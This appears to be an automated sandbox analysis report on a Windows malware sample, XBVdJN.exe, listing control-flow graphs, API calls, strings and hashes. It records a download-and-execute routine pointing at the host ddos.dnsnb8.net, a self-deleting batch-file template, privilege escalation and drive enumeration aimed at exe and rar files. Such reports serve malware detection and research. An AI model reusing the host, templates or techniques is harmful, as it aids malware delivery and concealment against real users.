                                                                                                                                                                                                                          control_flow_graph 126 6e1973-6e199a PathFileExistsA 127 6e1ac7-6e1acc 126->127 128 6e19a0-6e19aa 126->128 129 6e1ace 127->129 130 6e1ad0-6e1ad5 127->130 131 6e19af-6e19c2 CreateFileA 128->131 129->130 132 6e1ad7-6e1ad9 130->132 133 6e1af0-6e1af6 130->133 134 6e1a28-6e1a36 GetFileSize 131->134 135 6e19c4-6e19d3 Sleep 131->135 132->133 136 6e1a38-6e1a3b 134->136 137 6e1a87-6e1a8b 134->137 135->131 138 6e19d5-6e1a0b call 6e185b wsprintfA CopyFileA 135->138 136->137 139 6e1a3d-6e1a51 VirtualAlloc 136->139 140 6e1a8d-6e1a90 FindCloseChangeNotification 137->140 141 6e1a96-6e1a9a 137->141 138->134 149 6e1a0d-6e1a26 CreateFileA 138->149 139->137 144 6e1a53-6e1a57 139->144 140->141 145 6e1a9c 141->145 146 6e1aad-6e1ab1 141->146 150 6e1a59-6e1a6d ReadFile 144->150 151 6e1a80 144->151 152 6e1aa0-6e1aa7 DeleteFileA 145->152 147 6e1adb-6e1ae0 146->147 148 6e1ab3-6e1ab6 146->148 155 6e1ae7-6e1aec 147->155 156 6e1ae2-6e1ae5 147->156 148->127 153 6e1ab8-6e1ac1 VirtualFree 148->153 149->134 154 6e1a9e 149->154 150->137 157 6e1a6f-6e1a7e 150->157 151->137 152->146 153->127 154->152 155->133 158 6e1aee 155->158 156->155 157->150 157->151 158->133
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PathFileExistsA.KERNELBASE(\Nn`Nn,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1992
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006E19BA
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 006E19C6
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E19EC
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000000), ref: 006E1A00
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E1A1E
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 006E1A2C
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 006E1A46
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 006E1A65
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 006E1A90
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 006E1AA7
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006E1AC1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 006E19DB
                                                                                                                                                                                                                          • %s%.8X.data, xrefs: 006E19E6
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E197C
                                                                                                                                                                                                                          • \Nn`Nn, xrefs: 006E1980
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                                                                                                                                                                                          • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$\Nn`Nn
                                                                                                                                                                                                                          • API String ID: 2523042076-3222848328
                                                                                                                                                                                                                          • Opcode ID: 020662e7637a4845918e2e021eb7eacf21bc5ca680238f62d0f511e124cc5799
                                                                                                                                                                                                                          • Instruction ID: a7b7f8c9c32b3c9c9616cdf954c5e0395f81c4c4ddae8836e30d33e8f2425aff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020662e7637a4845918e2e021eb7eacf21bc5ca680238f62d0f511e124cc5799
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB513C71902399AFCB209F99CCC8AFEBBBAEB06354F104579F515AB290C3309E40DB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 159 6e28b8-6e28ff memset wsprintfA 160 6e29db-6e29df 159->160 161 6e2905-6e290d 159->161 161->160 162 6e2913-6e2919 161->162 163 6e291b-6e294c memset wsprintfA call 6e29e2 162->163 164 6e2956-6e2965 strrchr 162->164 167 6e2951 163->167 164->160 166 6e2967-6e2978 lstrcmpiA 164->166 168 6e297a-6e2981 call 6e1e6e 166->168 169 6e2988-6e2992 lstrcmpiA 166->169 167->160 172 6e2986 168->172 169->160 171 6e2994-6e299b 169->171 173 6e29ad-6e29c9 strstr 171->173 174 6e299d-6e29a3 171->174 172->160 175 6e29cb-6e29d1 call 6e239d 173->175 176 6e29d3-6e29d6 call 6e2692 173->176 174->173 177 6e29a5-6e29a7 lstrcpy 174->177 175->160 176->160 177->173
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E28D3
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E28F7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E2925
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E2940
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2A02
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: wsprintfA.USER32 ref: 006E2A1A
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2A44
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: lstrlen.KERNEL32(?), ref: 006E2A54
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 006E2A6C
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: strrchr.MSVCRT ref: 006E2A7C
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 006E2A9F
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: lstrlen.KERNEL32(Documents and Settings), ref: 006E2AAE
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2AC6
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2ADA
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: FindFirstFileA.KERNELBASE(?,?), ref: 006E2AEF
                                                                                                                                                                                                                            • Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2B13
                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 006E2959
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000001,exe), ref: 006E2974
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                                                                                                                                                          • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                                                                                                                                                                          • API String ID: 3004273771-1791786966
                                                                                                                                                                                                                          • Opcode ID: 865cb58cf4ab9ddf3e6272a421d58898d2d617e80b7e0e661f6550e85ba624a0
                                                                                                                                                                                                                          • Instruction ID: 0f1c2f1fbb8bb8dfd4a03f913c949615722f8925c9f7a404eb7dc6542386cc1b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 865cb58cf4ab9ddf3e6272a421d58898d2d617e80b7e0e661f6550e85ba624a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313A7194139E7BDB209767DC99FDA336F9F10310F041456F581A7282E6B4DAC48F60

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 181 6e1099-6e10b4 182 6e10ba-6e10c7 181->182 183 6e1199-6e119c 181->183 184 6e10c8-6e10d4 182->184 185 6e10da 184->185 186 6e1184-6e1190 184->186 187 6e1113-6e1162 call 6e185b wsprintfA * 2 URLDownloadToFileA 185->187 186->184 188 6e1196-6e1198 186->188 191 6e10dc-6e110d call 6e1000 WinExec lstrlen 187->191 192 6e1168-6e1182 lstrlen Sleep 187->192 188->183 191->187 191->188 192->186 192->187
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 006E185B: GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
                                                                                                                                                                                                                            • Part of subcall function 006E185B: srand.MSVCRT ref: 006E1878
                                                                                                                                                                                                                            • Part of subcall function 006E185B: rand.MSVCRT ref: 006E1880
                                                                                                                                                                                                                            • Part of subcall function 006E185B: srand.MSVCRT ref: 006E1890
                                                                                                                                                                                                                            • Part of subcall function 006E185B: rand.MSVCRT ref: 006E1894
                                                                                                                                                                                                                          • WinExec.KERNEL32(?,00000005), ref: 006E10F1
                                                                                                                                                                                                                          • lstrlen.KERNEL32(006E4748), ref: 006E10FA
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E112A
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E1143
                                                                                                                                                                                                                          • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 006E115B
                                                                                                                                                                                                                          • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 006E1169
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 006E1179
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                                                                                                                                                          • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGn$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                                                                                                                          • API String ID: 1280626985-1288325825
                                                                                                                                                                                                                          • Opcode ID: af4d0f14adca51f990610a154e152bf8afece3c8ca05f997fb5a07bc6136445e
                                                                                                                                                                                                                          • Instruction ID: c9c521aed48d16c4471ac1abed652f998af94419a9fe152e54ec7a7de35daff7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af4d0f14adca51f990610a154e152bf8afece3c8ca05f997fb5a07bc6136445e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8521A1719023D8BBCB20DBA1DC88BEEBBBFAB16315F110099E100AB151DB745B85DF60

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 195 6e1581-6e15f9 call 6e185b wsprintfA * 2 lstrlen CreateFileA 198 6e15fb-6e161b WriteFile CloseHandle 195->198 199 6e1633-6e1637 195->199 198->199 200 6e161d-6e162d ShellExecuteA 198->200 200->199
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 006E185B: GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
                                                                                                                                                                                                                            • Part of subcall function 006E185B: srand.MSVCRT ref: 006E1878
                                                                                                                                                                                                                            • Part of subcall function 006E185B: rand.MSVCRT ref: 006E1880
                                                                                                                                                                                                                            • Part of subcall function 006E185B: srand.MSVCRT ref: 006E1890
                                                                                                                                                                                                                            • Part of subcall function 006E185B: rand.MSVCRT ref: 006E1894
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E15AA
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E15C6
                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 006E15D2
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006E15EE
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 006E1609
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 006E1612
                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 006E162D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                                                                                                                                                          • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$open
                                                                                                                                                                                                                          • API String ID: 617340118-2664338557
                                                                                                                                                                                                                          • Opcode ID: 245534e39cbe17c7e75e52796fd3b6c6eb2036d596585d43d9fe3024faa2f8da
                                                                                                                                                                                                                          • Instruction ID: dc6cecf4b399184c7b21ad5e48cf7daca3035de79ed04eb79f91e5257aa8882a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 245534e39cbe17c7e75e52796fd3b6c6eb2036d596585d43d9fe3024faa2f8da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00117372A02378BBD72097A59C8DDEB7B6DDF5A760F000095F549E7240DA709F898BB0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 006E164F
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 006E165B
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,00000104), ref: 006E166E
                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,006E1099,00000000,00000000,00000000), ref: 006E16AC
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006E16BD
                                                                                                                                                                                                                            • Part of subcall function 006E139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E13BC
                                                                                                                                                                                                                            • Part of subcall function 006E139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006E13DA
                                                                                                                                                                                                                            • Part of subcall function 006E139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 006E1448
                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E16E5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$C:\Windows\system32$Documents and Settings
                                                                                                                                                                                                                          • API String ID: 123563730-1332623409
                                                                                                                                                                                                                          • Opcode ID: e1bd1cac9f22b145ce856a07f12c6cd0cabbfc3031f9272221c7f1318b9ef10d
                                                                                                                                                                                                                          • Instruction ID: 2759e8090f50f7dc0521f4d82d9c02ad28d3aa1069a68cda5bd03452d4d89042
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1bd1cac9f22b145ce856a07f12c6cd0cabbfc3031f9272221c7f1318b9ef10d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D11B4715023E47BCF206BA69D8DEDB3E6FEB46761F001015F2099E2A0DA718640DBA1

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 220 6e1000-6e1023 CreateFileA 221 6e1025-6e1055 GetFileSize CreateFileMappingA MapViewOfFile 220->221 222 6e1092-6e1096 220->222 223 6e107b-6e1085 221->223 224 6e1057-6e105f 221->224 227 6e108d-6e1091 CloseHandle 223->227 228 6e1087-6e108b CloseHandle 223->228 225 6e1074-6e1075 UnmapViewOfFile 224->225 226 6e1061-6e106e call 6e17d0 224->226 225->223 226->225 227->222 228->227
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGn,http://%s:%d/%s/%s,006E10E8,?), ref: 006E1018
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 006E1029
                                                                                                                                                                                                                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 006E1038
                                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 006E104B
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 006E1075
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 006E108B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 006E108E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                                                                                                                                                                          • String ID: HGn$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                                                                                                                          • API String ID: 1223616889-4110687402
                                                                                                                                                                                                                          • Opcode ID: 1536993e770b02ab432a93e1e205656cd13da3a2be67887ad9ec11395a0dc86e
                                                                                                                                                                                                                          • Instruction ID: 8e87a23f975232919a2943931d55259ac0e408266c92d472ce16f66632906127
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1536993e770b02ab432a93e1e205656cd13da3a2be67887ad9ec11395a0dc86e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6701847110039CBFE7306F619CCCE6BBBAEEB457A9F004529F245AB290DA705E449B60

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 382 6e2b8c-6e2bc6 memset GetLogicalDriveStringsA 383 6e2bc8-6e2bcc 382->383 384 6e2c09-6e2c28 WaitForMultipleObjects 382->384 385 6e2bce-6e2bd0 383->385 386 6e2bfa-6e2c07 lstrlen 383->386 387 6e2c3c-6e2c45 384->387 388 6e2c2a-6e2c3a CreateThread 384->388 385->386 389 6e2bd2-6e2bdc GetDriveTypeA 385->389 386->383 386->384 388->387 389->386 390 6e2bde-6e2be1 389->390 390->386 391 6e2be3-6e2bf6 CreateThread 390->391 391->386
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E2BA6
                                                                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 006E2BB4
                                                                                                                                                                                                                          • GetDriveTypeA.KERNELBASE(?), ref: 006E2BD3
                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,006E2B7D,?,00000000,00000000), ref: 006E2BEE
                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 006E2BFB
                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 006E2C16
                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,006E2845,00000000,00000000,00000000), ref: 006E2C3A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1073171358-0
                                                                                                                                                                                                                          • Opcode ID: 507c096f6f2877c258ec2dd512cf6b9da08de9f376c4fd6054f888b75cd5c1f8
                                                                                                                                                                                                                          • Instruction ID: 2e7b40b2caba5f64250181656bf63a49f8aa7d0d1aeffd94e66ec459aabcfcac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 507c096f6f2877c258ec2dd512cf6b9da08de9f376c4fd6054f888b75cd5c1f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E21D2B18013DEAFE7209F65AC88DEF7B6FFB04348B250129F84297251D7248E06CB61

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 392 6e2c48-6e2c75 memset call 6e1973 395 6e2c77-6e2c7f 392->395 396 6e2cb2-6e2cb9 392->396 397 6e2c8f-6e2cac CreateThread WaitForMultipleObjects 395->397 398 6e2c81-6e2c8b 395->398 399 6e2cbb-6e2cc2 VirtualFree 396->399 400 6e2cc8-6e2ccc 396->400 397->396 398->397 399->400
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E2C57
                                                                                                                                                                                                                            • Part of subcall function 006E1973: PathFileExistsA.KERNELBASE(\Nn`Nn,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1992
                                                                                                                                                                                                                            • Part of subcall function 006E1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006E19BA
                                                                                                                                                                                                                            • Part of subcall function 006E1973: Sleep.KERNEL32(00000064), ref: 006E19C6
                                                                                                                                                                                                                            • Part of subcall function 006E1973: wsprintfA.USER32 ref: 006E19EC
                                                                                                                                                                                                                            • Part of subcall function 006E1973: CopyFileA.KERNEL32(?,?,00000000), ref: 006E1A00
                                                                                                                                                                                                                            • Part of subcall function 006E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E1A1E
                                                                                                                                                                                                                            • Part of subcall function 006E1973: GetFileSize.KERNEL32(?,00000000), ref: 006E1A2C
                                                                                                                                                                                                                            • Part of subcall function 006E1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 006E1A46
                                                                                                                                                                                                                            • Part of subcall function 006E1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 006E1A65
                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 006E2C99
                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000001,006E16BA,00000001,000000FF,?,006E16BA,00000000), ref: 006E2CAC
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(007D0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,006E4E5C,006E4E60,?,006E16BA,00000000), ref: 006E2CC2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E2C69
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
